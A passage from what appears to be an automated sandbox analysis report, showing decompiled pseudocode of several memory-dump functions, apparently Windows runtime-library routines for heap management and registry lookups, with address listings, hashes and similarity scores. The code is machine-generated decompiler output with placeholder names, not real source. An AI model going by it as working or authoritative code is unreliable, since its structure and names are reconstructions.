					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05389520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0537E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0539DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5436901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5436901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05389980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E053895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E05367D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E05367D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E053C7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E053DFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5435350;
							if(_t109 != 0x5435350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E053DFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E053D5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                      0x05342d8a
                                      0x05342d8a
                                      0x05342d92
                                      0x05342d96
                                      0x05342d9e
                                      0x05342da0
                                      0x05342da3
                                      0x05342da5
                                      0x05342da8
                                      0x05342dab
                                      0x05342db2
                                      0x0539f9aa
                                      0x0539f9ab
                                      0x0539f9ae
                                      0x0539f9ae
                                      0x05342db8
                                      0x05342dc2
                                      0x0539f9b9
                                      0x0539f9be
                                      0x0539f9bf
                                      0x0539f9bf
                                      0x05342dcf
                                      0x0539f9c9
                                      0x05342dd5
                                      0x05342dd5
                                      0x05342dd5
                                      0x05342dde
                                      0x05342de1
                                      0x05342e70
                                      0x05342e72
                                      0x05342e72
                                      0x05342de7
                                      0x05342deb
                                      0x05342e7c
                                      0x05342e83
                                      0x05342e85
                                      0x05342e8b
                                      0x05342e8d
                                      0x05342e92
                                      0x05342e92
                                      0x05342e85
                                      0x05342df1
                                      0x05342df7
                                      0x05342df9
                                      0x05342df9
                                      0x05342dfc
                                      0x05342dff
                                      0x05342e02
                                      0x00000000
                                      0x05342e05
                                      0x05342e0c
                                      0x0539f9d9
                                      0x05342e12
                                      0x05342e12
                                      0x05342e12
                                      0x05342e1a
                                      0x0539f9e3
                                      0x0539f9e9
                                      0x0539f9f0
                                      0x0539f9f6
                                      0x0539f9f8
                                      0x0539f9f8
                                      0x0539f9f0
                                      0x05342e23
                                      0x0539fa02
                                      0x0539fa03
                                      0x0539fa05
                                      0x0539fa06
                                      0x00000000
                                      0x05342e29
                                      0x05342e29
                                      0x05342e2e
                                      0x05342e34
                                      0x05342e3e
                                      0x00000000
                                      0x00000000
                                      0x05342e44
                                      0x05342e47
                                      0x05342e4d
                                      0x00000000
                                      0x00000000
                                      0x05342e4f
                                      0x05342e54
                                      0x00000000
                                      0x00000000
                                      0x05342e5a
                                      0x05342e5f
                                      0x05342e9a
                                      0x05342ea4
                                      0x05342ea5
                                      0x05342ea8
                                      0x05342eaf
                                      0x05342eb2
                                      0x05342eb5
                                      0x0539fae9
                                      0x0539faeb
                                      0x0539faed
                                      0x0539faef
                                      0x0539faf7
                                      0x0539faf8
                                      0x0539fafd
                                      0x0539faff
                                      0x0539fb04
                                      0x0539fb04
                                      0x0539faff
                                      0x05342ec0
                                      0x05342ec4
                                      0x05342ec6
                                      0x05342ec8
                                      0x0539fb14
                                      0x0539fb18
                                      0x0539fb1e
                                      0x0539fb21
                                      0x0539fb21
                                      0x05342ece
                                      0x05342ece
                                      0x05342ece
                                      0x05342ed7
                                      0x05342e61
                                      0x05342e63
                                      0x0539fa6b
                                      0x0539fa71
                                      0x0539fa76
                                      0x0539fa78
                                      0x0539fa8a
                                      0x0539fa7a
                                      0x0539fa83
                                      0x0539fa83
                                      0x0539fa8f
                                      0x0539fa91
                                      0x0539fa97
                                      0x0539fa9d
                                      0x0539faa4
                                      0x0539faaa
                                      0x0539faaf
                                      0x0539fab1
                                      0x0539fac3
                                      0x0539fab3
                                      0x0539fabc
                                      0x0539fabc
                                      0x0539fac8
                                      0x0539facb
                                      0x0539fadf
                                      0x0539fadf
                                      0x0539facb
                                      0x0539faa4
                                      0x0539fa91
                                      0x05342e6f
                                      0x05342e6f
                                      0x05342e5f
                                      0x0539fa13
                                      0x0539fa15
                                      0x0539fa17
                                      0x0539fa1f
                                      0x0539fa21
                                      0x0539fa22
                                      0x0539fa25
                                      0x0539fa28
                                      0x0539fa2f
                                      0x0539fa2f
                                      0x0539fa2a
                                      0x0539fa2a
                                      0x0539fa2a
                                      0x0539fa31
                                      0x0539fa34
                                      0x0539fa36
                                      0x0539fa3c
                                      0x0539fa3e
                                      0x0539fa41
                                      0x0539fa43
                                      0x0539fa45
                                      0x0539fa45
                                      0x0539fa41
                                      0x0539fa3c
                                      0x0539fa4a
                                      0x0539fa4f
                                      0x0539fa51
                                      0x0539fa53
                                      0x0539fa56
                                      0x0539fa5b
                                      0x0539fa5e
                                      0x00000000
                                      0x0539fa5e
                                      0x05342e23

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Re-Waiting
                                      • API String ID: 0-316354757
                                      • Opcode ID: e8449b6257b48fb1ef15b26d3d8ae58c570a968a15ad852a2db01b35a6bfb0d7
                                      • Instruction ID: 8c753743a956bdc4e15f48939c2eb6c657ddace011f290ca244b12b668f14948
                                      • Opcode Fuzzy Hash: e8449b6257b48fb1ef15b26d3d8ae58c570a968a15ad852a2db01b35a6bfb0d7
                                      • Instruction Fuzzy Hash: 6E6134B1B046049FDB26DB68C884B7FB7E6FB45324F144669F812E72D0C7B4A9408B92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05410EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E05410EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0540FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05411074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05389730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0540A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0540A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5438b04 >> 0x14) + (_v44 -  *0x5438b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E05367D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0540138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E05367D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E053FFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5438724 & 0x00000008) != 0) {
						E054052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E054115B5(0x5438ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                      0x05410eb7
                                      0x05410eb9
                                      0x05410ec0
                                      0x05410ec2
                                      0x05410ecd
                                      0x0541105b
                                      0x0541105b
                                      0x05411061
                                      0x05411066
                                      0x05411066
                                      0x0541106b
                                      0x05411073
                                      0x05411073
                                      0x05410ed3
                                      0x05410ed6
                                      0x05410edc
                                      0x05410ee0
                                      0x05410ee7
                                      0x05410ef0
                                      0x05410ef5
                                      0x05410efa
                                      0x05410efc
                                      0x05410efd
                                      0x05410f03
                                      0x05410f04
                                      0x05410f06
                                      0x05410f07
                                      0x05410f09
                                      0x05410f0e
                                      0x05410f14
                                      0x05410f23
                                      0x05410f2d
                                      0x05410f34
                                      0x05410f34
                                      0x05410f14
                                      0x05410f52
                                      0x00000000
                                      0x00000000
                                      0x05410f58
                                      0x05410f73
                                      0x05410f74
                                      0x05410f79
                                      0x05410f7d
                                      0x05410f80
                                      0x05410f86
                                      0x05410fab
                                      0x05410fb5
                                      0x05410fc6
                                      0x05410fd1
                                      0x05410fe3
                                      0x05410fd3
                                      0x05410fdc
                                      0x05410fdc
                                      0x05410feb
                                      0x05411009
                                      0x05411009
                                      0x05411015
                                      0x05411027
                                      0x05411017
                                      0x05411020
                                      0x05411020
                                      0x0541102f
                                      0x0541103c
                                      0x0541103c
                                      0x05411048
                                      0x05411050
                                      0x05411050
                                      0x05411055
                                      0x00000000
                                      0x05411055
                                      0x05410f88
                                      0x05410f9e
                                      0x05410fa2
                                      0x05410fa9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05410fa9
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: d4184977b84e9f9db24e520882f763554ae757f5d0a31e136e478a3d5fea98d8
                                      • Instruction ID: c33c5b803c62b7c027cf4f23259b40f704251e9561c92f0d737aa0d30b26160e
                                      • Opcode Fuzzy Hash: d4184977b84e9f9db24e520882f763554ae757f5d0a31e136e478a3d5fea98d8
                                      • Instruction Fuzzy Hash: AF51DD713083419BD324DF28C888B9BBBE5FBC4304F04092EF98687690D770E945CB26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E0537F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E05364120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05389830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05389990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E053895D0();
							goto L11;
						} else {
							_t109 = L05364620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0538F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E053895D0();
										L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                      0x0537f0d3
                                      0x0537f0d9
                                      0x0537f0e0
                                      0x0537f0e7
                                      0x0537f0f2
                                      0x0537f0f4
                                      0x0537f0f8
                                      0x0537f100
                                      0x0537f108
                                      0x0537f10d
                                      0x0537f115
                                      0x0537f116
                                      0x0537f11f
                                      0x0537f123
                                      0x0537f124
                                      0x0537f12c
                                      0x0537f130
                                      0x0537f134
                                      0x0537f13d
                                      0x0537f144
                                      0x0537f14b
                                      0x0537f152
                                      0x053bbab0
                                      0x053bbab0
                                      0x0537f158
                                      0x0537f158
                                      0x0537f15a
                                      0x0537f160
                                      0x0537f165
                                      0x0537f166
                                      0x0537f16f
                                      0x0537f173
                                      0x053bbaa7
                                      0x053bbaa7
                                      0x053bbaab
                                      0x00000000
                                      0x0537f179
                                      0x0537f18d
                                      0x0537f191
                                      0x053bbaa2
                                      0x00000000
                                      0x0537f197
                                      0x0537f19b
                                      0x0537f1a2
                                      0x0537f1a9
                                      0x0537f1af
                                      0x0537f1b2
                                      0x0537f1b6
                                      0x0537f1b9
                                      0x0537f1c4
                                      0x0537f1d8
                                      0x0537f1df
                                      0x0537f1e3
                                      0x0537f1eb
                                      0x0537f1ee
                                      0x0537f1f4
                                      0x0537f20f
                                      0x053bbab7
                                      0x053bbabb
                                      0x053bbacc
                                      0x053bbad1
                                      0x0537f215
                                      0x0537f218
                                      0x0537f226
                                      0x0537f22b
                                      0x00000000
                                      0x0537f22b
                                      0x0537f1f6
                                      0x0537f1f6
                                      0x0537f1f9
                                      0x0537f1fb
                                      0x0537f1fb
                                      0x0537f1f4
                                      0x0537f191
                                      0x0537f173
                                      0x0537f152
                                      0x0537f203

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction ID: 3d6e49c3f86a919fe6d68f2df3cd0d516a3d4c725a3ae88d31185459548a79de
                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction Fuzzy Hash: 80519F716047149FD321DF19C840A6BB7F9FF48710F00892DF99697690E7B4E904CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E053C3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x543d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05380BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E053C3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0538FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E053C3540;
						E0538FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0539DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E053D0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E053897C0();
					}
					return E0538B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E053C3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E053C3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0538FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05389650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E053C3787(_a4,  &_v352, _t80);
						}
					}
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E053895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                      0x053c3552
                                      0x053c355a
                                      0x053c355d
                                      0x053c3566
                                      0x053c3567
                                      0x053c357e
                                      0x053c358f
                                      0x053c35a1
                                      0x053c35a5
                                      0x053c366b
                                      0x053c366b
                                      0x053c366d
                                      0x053c3672
                                      0x053c3679
                                      0x053c3685
                                      0x053c368d
                                      0x053c369d
                                      0x053c36a7
                                      0x053c36b8
                                      0x053c36c6
                                      0x053c36c7
                                      0x053c36dc
                                      0x053c36e1
                                      0x053c36e7
                                      0x053c36e9
                                      0x053c36e9
                                      0x053c3703
                                      0x053c3703
                                      0x053c35b5
                                      0x053c35c0
                                      0x053c35c4
                                      0x00000000
                                      0x00000000
                                      0x053c35ca
                                      0x053c35d7
                                      0x053c35e2
                                      0x053c35e6
                                      0x053c35e8
                                      0x053c35f5
                                      0x053c35fa
                                      0x053c3603
                                      0x053c3604
                                      0x053c3609
                                      0x053c360a
                                      0x053c3612
                                      0x053c3613
                                      0x053c361e
                                      0x053c3622
                                      0x053c3628
                                      0x053c362f
                                      0x053c362f
                                      0x053c3636
                                      0x053c3638
                                      0x053c363b
                                      0x053c3642
                                      0x053c3642
                                      0x053c3636
                                      0x053c3657
                                      0x053c3657
                                      0x053c365c
                                      0x053c3662
                                      0x053c3669
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: BinaryHash
                                      • API String ID: 2994545307-2202222882
                                      • Opcode ID: e1c0fa1683d1945904dcf5872108d67759b560389c76f4e28a0acb9a16221647
                                      • Instruction ID: 24a7d3ca5d2d981f9eb47c154c1cd4d7a0116c3a391b2f19ff696d0ce8598fab
                                      • Opcode Fuzzy Hash: e1c0fa1683d1945904dcf5872108d67759b560389c76f4e28a0acb9a16221647
                                      • Instruction Fuzzy Hash: 814138F2D0062C9BDB21EA50CC85FEEB77CAB44714F0085E9E609A7240DB749E98CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054105AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E054105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E054107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05389730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0540A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0540A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05411293(_t79, _v40, E054107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E05367D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0540138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                      0x054105c5
                                      0x054105ca
                                      0x054105d3
                                      0x054106db
                                      0x054106db
                                      0x054106dd
                                      0x054106e3
                                      0x054106e3
                                      0x054105dd
                                      0x054105e7
                                      0x054105f6
                                      0x05410600
                                      0x05410607
                                      0x05410610
                                      0x05410615
                                      0x0541061a
                                      0x0541061c
                                      0x0541061e
                                      0x05410624
                                      0x05410625
                                      0x05410627
                                      0x05410628
                                      0x05410631
                                      0x05410640
                                      0x0541064d
                                      0x05410654
                                      0x05410654
                                      0x05410631
                                      0x0541066d
                                      0x05410674
                                      0x00000000
                                      0x00000000
                                      0x05410692
                                      0x0541069e
                                      0x054106b0
                                      0x054106a0
                                      0x054106a9
                                      0x054106a9
                                      0x054106b8
                                      0x054106d6
                                      0x054106d6
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction ID: 23b039619583b157c2be4f88bb7d4c185aa91dc55f87471eb45fd9aa27b5e660
                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction Fuzzy Hash: 6031E0327043056BE720DE26CC88FDB7799BB84754F04422AFE59DB280D770E944CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E053C3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05389650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L05364620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05389650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
